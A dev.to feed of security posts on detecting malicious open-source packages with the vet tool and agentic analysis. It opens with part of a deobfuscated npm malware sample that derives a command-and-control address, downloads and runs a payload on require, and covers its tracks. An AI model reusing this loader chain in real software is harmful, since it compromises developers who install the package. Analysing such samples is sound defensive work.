class="nx">scriptPath</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Only needed for non-Windows platforms</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">win32</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">scriptContent</span> <span class="o">=</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">readFileSync</span><span class="p">(</span><span class="nx">scriptPath</span><span class="p">).</span><span class="nf">toString</span><span class="p">();</span> <span class="kd">const</span> <span class="nx">nodePath</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">getNodePath</span><span class="p">();</span> <span class="c1">// Replace "node" with the absolute path</span> <span class="kd">const</span> <span class="nx">updatedContent</span> <span class="o">=</span> <span class="nx">scriptContent</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="dl">'</span><span class="s1">"node"</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">"</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">nodePath</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">"</span><span class="dl">'</span><span class="p">);</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">writeFileSync</span><span class="p">(</span><span class="nx">scriptPath</span><span class="p">,</span> <span class="nx">updatedContent</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="cm">/** * Downloads a file from a URL to a specified location */</span> <span class="kd">function</span> <span class="nf">downloadFile</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="nx">targetPath</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Choose http or https based on URL</span> <span class="kd">let</span> <span class="nx">httpModule</span> <span class="o">=</span> <span class="nx">url</span><span class="p">.</span><span class="nf">startsWith</span><span class="p">(</span><span class="dl">'</span><span class="s1">https</span><span class="dl">'</span><span class="p">)</span> <span class="p">?</span> <span class="nx">https</span> <span class="p">:</span> <span class="nx">http</span><span class="p">;</span> <span class="k">return</span> <span class="k">new</span> <span class="nc">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">httpModule</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="p">(</span><span class="nx">response</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nx">statusCode</span> <span class="o">!==</span> <span class="mi">200</span><span class="p">)</span> <span class="p">{</span> <span class="nf">reject</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">fileStream</span> <span class="o">=</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">createWriteStream</span><span class="p">(</span><span class="nx">targetPath</span><span class="p">);</span> <span class="nx">response</span><span class="p">.</span><span class="nf">pipe</span><span class="p">(</span><span class="nx">fileStream</span><span class="p">);</span> <span class="nx">fileStream</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">finish</span><span class="dl">'</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nf">resolve</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="p">});</span> <span class="p">});</span> <span class="p">});</span> <span class="p">}</span> <span class="cm">/** * Domain generation algorithm using XOR operations * Creates C2 (command and control) server address from file hash and fixed value */</span> <span class="kd">function</span> <span class="nf">generateDomain</span><span class="p">(</span><span class="nx">hash</span><span class="p">,</span> <span class="nx">fixedValue</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// XOR each byte of the hash with the fixed value</span> <span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">fixedValue</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">xorResult</span> <span class="o">=</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">hash</span><span class="p">[</span><span class="nx">i</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span> <span class="o">^</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">fixedValue</span><span class="p">[</span><span class="nx">i</span><span class="p">],</span> <span class="mi">16</span><span class="p">);</span> <span class="nx">result</span> <span class="o">+=</span> <span class="nx">xorResult</span><span class="p">.</span><span class="nf">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Convert the hex result to a dotted IP address format</span> <span class="kd">let</span> <span class="nx">ipAddress</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">result</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">ipAddress</span><span class="p">)</span> <span class="p">{</span> <span class="nx">ipAddress</span> <span class="o">+=</span> <span class="dl">'</span><span class="s1">.</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span> <span class="nx">ipAddress</span> <span class="o">+=</span> <span class="nf">parseInt</span><span class="p">(</span><span class="nx">result</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="nx">i</span><span class="p">,</span> <span class="nx">i</span> <span class="o">+</span> <span class="mi">2</span><span class="p">),</span> <span class="mi">16</span><span class="p">).</span><span class="nf">toString</span><span class="p">();</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">ipAddress</span><span class="p">;</span> <span class="p">}</span> <span class="cm">/** * Creates the URL for downloading the actual malware payload */</span> <span class="kd">function</span> <span class="nf">createMalwareUrl</span><span class="p">(</span><span class="nx">domain</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="s2">`http://</span><span class="p">${</span><span class="nx">domain</span><span class="p">}</span><span class="s2">/public/startup.js?ver=1.2&amp;type=module`</span><span class="p">;</span> <span class="p">}</span> <span class="cm">/** * Main execution function that orchestrates the attack */</span> <span class="kd">function</span> <span class="nf">executeAttack</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// Get the target path for the malware</span> <span class="kd">let</span> <span class="nx">targetPath</span> <span class="o">=</span> <span class="nf">getScriptPath</span><span class="p">();</span> <span class="c1">// Download the initial script, generate domain, download malware, and execute it</span> <span class="nf">downloadFile</span><span class="p">(</span><span class="nx">decodedUrl</span><span class="p">,</span> <span class="nx">targetPath</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// Calculate hash of the downloaded file</span> <span class="kd">const</span> <span class="nx">fileContent</span> <span class="o">=</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">readFileSync</span><span class="p">(</span><span class="nx">targetPath</span><span class="p">);</span> <span class="nx">sha256Hash</span><span class="p">.</span><span class="nf">update</span><span class="p">(</span><span class="nx">fileContent</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">fileHash</span> <span class="o">=</span> <span class="nx">sha256Hash</span><span class="p">.</span><span class="nf">digest</span><span class="p">(</span><span class="dl">'</span><span class="s1">hex</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// Generate C2 domain using the hash and a fixed value</span> <span class="k">return</span> <span class="nf">createMalwareUrl</span><span class="p">(</span><span class="nf">generateDomain</span><span class="p">(</span><span class="nx">fileHash</span><span class="p">,</span> <span class="dl">'</span><span class="s1">496AAC7E</span><span class="dl">'</span><span class="p">));</span> <span class="p">})</span> <span class="p">.</span><span class="nf">then</span><span class="p">((</span><span class="nx">malwareUrl</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">downloadFile</span><span class="p">(</span><span class="nx">malwareUrl</span><span class="p">,</span> <span class="nx">targetPath</span><span class="p">))</span> <span class="p">.</span><span class="nf">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="nf">fixNodePath</span><span class="p">(</span><span class="nx">targetPath</span><span class="p">))</span> <span class="p">.</span><span class="nf">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// Make the script executable and run it</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">chmodSync</span><span class="p">(</span><span class="nx">targetPath</span><span class="p">,</span> <span class="dl">'</span><span class="s1">755</span><span class="dl">'</span><span class="p">);</span> <span class="nf">runScript</span><span class="p">(</span><span class="nx">targetPath</span><span class="p">);</span> <span class="p">})</span> <span class="p">.</span><span class="k">finally</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// Clean up after 1.5 seconds to allow time for script to execute</span> <span class="nf">setTimeout</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nf">coverTracks</span><span class="p">();</span> <span class="p">},</span> <span class="mi">1500</span><span class="p">);</span> <span class="p">});</span> <span class="p">}</span> <span class="c1">// Execute the malicious code immediately when this file is required</span> <span class="nf">executeAttack</span><span class="p">();</span> </code></pre> </div> npm javascript security devops Agentic Analysis of Open Source Package Code for Malware Abhisek Datta Tue, 08 Apr 2025 16:19:29 +0000 https://dev.to/abhisek/agentic-analysis-of-open-source-package-code-for-malware-5h3f https://dev.to/abhisek/agentic-analysis-of-open-source-package-code-for-malware-5h3f <p>Experiments with agentic workflows for malicious package analysis built using Claude Desktop, Model Context Protocol (MCP) server, static code analysis and SafeDep Cloud API tools.</p> <h2> Demo </h2> <p> <iframe src="https://www.youtube.com/embed/Od_KegSb0Bs"> </iframe> </p> <h2> Architecture </h2> <p>For the demo, we exposed the following through an MCP Interface to MCP clients like Claude Desk</p> <ol> <li><a href="https://docs.safedep.io/guides/insights-api-using-typescript" rel="noopener noreferrer">Insights API</a></li> <li><a href="https://docs.safedep.io/cloud/malware-analysis" rel="noopener noreferrer">Malicious Package Scanning API</a></li> <li>Misc tools for GitHub API access</li> <li>Misc tools for package registry (e.g. <code>npm</code>) access</li> </ol> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7jmik44b69ue5vg53nj.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7jmik44b69ue5vg53nj.png" alt=" "></a></p> <h2> Looking Ahead </h2> <p>While the results are promising and exciting for us but there is a long way to go to productionize this. For example, our automated systems that monitor public package registries use statically coded workflows and operate at &lt; 10% time cost of the agentic execution currently. It also minimizes LLM calls by leveraging static code analysis and opinionated rules to scale much better.</p> <p>For proactive protection against malicious open source packages in CI/CD, try vet, its free and open source</p> <p>➡️ <a href="https://github.com/safedep/vet" rel="noopener noreferrer">https://github.com/safedep/vet</a></p> Scanning Open Source Packages for Malicious Code 🚨 Abhisek Datta Wed, 26 Mar 2025 17:08:08 +0000 https://dev.to/abhisek/scanning-open-source-packages-for-malicious-code-4f09 https://dev.to/abhisek/scanning-open-source-packages-for-malicious-code-4f09 <p>Malicious code in open sources is real and people get hacked due to it as we have seen with <a href="https://github.com/tj-actions/changed-files/issues/2463" rel="noopener noreferrer">changed-files incident</a>, <a href="https://www.wiz.io/blog/ultralytics-ai-library-hacked-via-github-for-cryptomining" rel="noopener noreferrer">ultralytics hack</a> and multiple such incidents. <a href="https://github.com/safedep/vet" rel="noopener noreferrer">vet</a> now supports identification of malicious OSS packages through active code analysis.</p> <h2> 🚀 Getting Started </h2> <ul> <li>Install <a href="https://github.com/safedep/vet" rel="noopener noreferrer">vet</a> </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>brew tap safedep/tap brew install safedep/tap/vet </code></pre> </div> <p>For other installation methods, refer to <a href="https://github.com/safedep/vet?tab=readme-ov-file#getting-started" rel="noopener noreferrer">README.md</a></p> <ul> <li>Onboard to <a href="https://docs.safedep.io/cloud" rel="noopener noreferrer">SafeDep Cloud</a> to use the code analysis infrastructure using <code>vet</code> </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet cloud quickstart </code></pre> </div> <h2> 🐞 Malicious Package Scanning </h2> <ul> <li>Scan a single package </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet inspect malware --purl pkg:/npm/llm-oracle@1.0.2 </code></pre> </div> <ul> <li>Scan a repository with auto-discovered packages </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan -D /path/to/repo --malware </code></pre> </div> <h3> 🔍 Supported Ecosystems </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Ecosystem</th> <th>Support</th> </tr> </thead> <tbody> <tr> <td>Javascript (npm)</td> <td>✅</td> </tr> <tr> <td>Python (pypi)</td> <td>✅</td> </tr> <tr> <td>Java (Maven)</td> <td>❌</td> </tr> <tr> <td>Go (modules)</td> <td>✅</td> </tr> <tr> <td>Rust (crates.io)</td> <td>❌</td> </tr> <tr> <td>Ruby (rubygems)</td> <td>✅</td> </tr> </tbody> </table></div> <p>➡️ Raise an <a href="https://github.com/safedep/vet/issues" rel="noopener noreferrer">issue</a> to request an ecosystem to be prioritised</p> <h2> 👾 Live Demo </h2> <p><iframe width="710" height="399" src="https://www.youtube.com/embed/A5QbT1HpKEw"> </iframe> </p> <h2> 📊 Resources </h2> <ul> <li><a href="https://github.com/safedep/vet" rel="noopener noreferrer">https://github.com/safedep/vet</a></li> <li><a href="https://github.com/safedep/vet-action" rel="noopener noreferrer">https://github.com/safedep/vet-action</a></li> <li><a href="https://docs.safedep.io/cloud/malware-analysis" rel="noopener noreferrer">https://docs.safedep.io/cloud/malware-analysis</a></li> </ul> Safe and Secure Consumption of Open Source Libraries Abhisek Datta Thu, 04 Jul 2024 08:10:40 +0000 https://dev.to/abhisek/safe-and-secure-consumption-of-open-source-libraries-2mfj https://dev.to/abhisek/safe-and-secure-consumption-of-open-source-libraries-2mfj <p>Open Source software is the foundation of modern software projects. Any software written today <a href="https://www.linuxfoundation.org/blog/blog/a-summary-of-census-ii-open-source-software-application-libraries-the-world-depends-on">consists of 70-90% of open source code</a> in form of libraries and other components. These open source libraries often comes with security risks and introduce technical debt over time in consumer software projects. These risks include</p> <ul> <li>Vulnerability</li> <li>Malware</li> <li>Unmaintained / unpopular projects</li> <li>License</li> </ul> <p>In this post, we will look at how we can use <a href="https://github.com/safedep/vet">vet</a>, an open source tool for vetting open source libraries before use by software consumers.</p> <p>Full Disclosure: I am the creator of <code>vet</code>. You can follow the GitHub project at <a href="https://github.com/safedep/vet">https://github.com/safedep/vet</a></p> <h2> TL;DR </h2> <p>Note: Examples in this post are created by using <code>vet</code> to scan <a href="https://github.com/safedep/demo-client-java">https://github.com/safedep/demo-client-java</a> which is a Java app with intentionally older version of libraries</p> <ul> <li>Install <code>vet</code> by following <a href="https://docs.safedep.io/installation">documentation on installation</a> </li> <li>If you are using <code>homebrew</code>, you can install it easily </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>brew tap safedep/tap brew install safedep/tap/vet </code></pre> </div> <ul> <li>Scan your project source code for vulnerabilities and other risks </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan -D /path/to/source </code></pre> </div> <p>The default configuration should scan your package manifest (e.g. <code>package-lock.json</code>, <code>gradle.lockfile</code>, <code>pom.xml</code>) and identify the most risky open source libraries that your software depends on. Upgrading these libraries usually reduce the risk of vulnerabilities.</p> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftj758fjmzg6w9ygupppe.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftj758fjmzg6w9ygupppe.png" alt="vet Default Scan Result" width="800" height="412"></a></p> <p>Instead of scanning entire source directory, you can scan specific package manifests as well. This is useful for monorepo or to avoid noise of <code>vet</code> picking up documentation or test data related sub-modules<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan --lockfiles gradle.lockfile --lockfiles ui/package-lock.json </code></pre> </div> <h2> Filters </h2> <p>Like most other security tools, <code>vet</code> by default uses an opinionated approach to identifying "risk" which may not be suitable for all consumers. The <code>filters</code> feature of <code>vet</code> allows consumers to identify the risky OSS libraries that they care about.</p> <ul> <li>Identify only libraries that has a critical vulnerability </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan -D /path/to/source --filter 'vulns.critical.exists(p, true)' </code></pre> </div> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmsc72gcqj1v1345njyni.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmsc72gcqj1v1345njyni.png" alt="Find vulnerable dependencies" width="800" height="106"></a></p> <ul> <li>Identify libraries that are unmaintained </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan -D /path/to/source --filter 'scorecard.scores.Maintained == 0' </code></pre> </div> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Farkcou1l3qz3q1p1vj0v.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Farkcou1l3qz3q1p1vj0v.png" alt="Find unmaintained dependencies" width="800" height="204"></a></p> <p>Scorecard checks are based on <a href="https://scorecard.dev/">OpenSSF Scorecard Project</a></p> <ul> <li>Find libraries with a specific license </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan -D /path/to/source --filter 'licenses.exists(p, p == "MIT")' </code></pre> </div> <p>For a full list of filtering capabilities, refer to the <a href="https://docs.safedep.io/advanced/filtering">documentation</a></p> <h2> Reporting </h2> <p>Mitigation, fixing, response or integration with other tools requires additional information which can be obtained using various <a href="https://docs.safedep.io/reporting">supported reporting format</a>.</p> <p>Common use-cases include</p> <ul> <li>Exporting risky libraries as CSV report </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan -D /path/to/source --filter 'vulns.critical.exists(p, true)' --report-csv report.csv </code></pre> </div> <ul> <li>Exporting risky libraries as SARIF report </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan -D /path/to/source --filter 'vulns.critical.exists(p, true)' --report-sarif report.sarif </code></pre> </div> <h2> Policy as Code </h2> <p>The filters can be combined together into YAML document to achieve policy as code capability with <code>vet</code>. It can be used to build a guard rail in CI/CD against introducing risky OSS libraries.</p> <p><a href="https://github.com/safedep/vet/blob/main/samples/filter-suites/fs-generic.yml">Example Policy</a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vet scan -D /path/to/source --filter-suite policy.yml --filter-fail </code></pre> </div> <p>Policy violations will trigger a non-zero exit code in <code>vet</code> with error such as<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>scan failed due to error: CEL Filter Suite analyzer raised an event to fail with: failed due to filter suite match on demo-client-java/gradle.lockfile </code></pre> </div> <p>This is useful for CI integration where the build step is failed based on exit code. Refer to <a href="https://docs.safedep.io/advanced/polic-as-code">policy as code documentation</a> for more details.</p> <h2> Conclusion </h2> <p>Consuming OSS libraries require security vetting. <a href="https://github.com/safedep/vet">vet</a> project goal is to make the process of OSS library vetting easy and automated while providing the necessary controls and customization for wider adoption. </p> <p><a href="https://github.com/safedep/vet">vet</a> is a community driven project and welcomes community participation and contribution. Report bugs or ask for new feature using <a href="https://github.com/safedep/vet/issues">GitHub issue</a> and join us on <a href="https://docs.safedep.io/community">community Discord</a>.</p> security opensource devops softwaredevelopment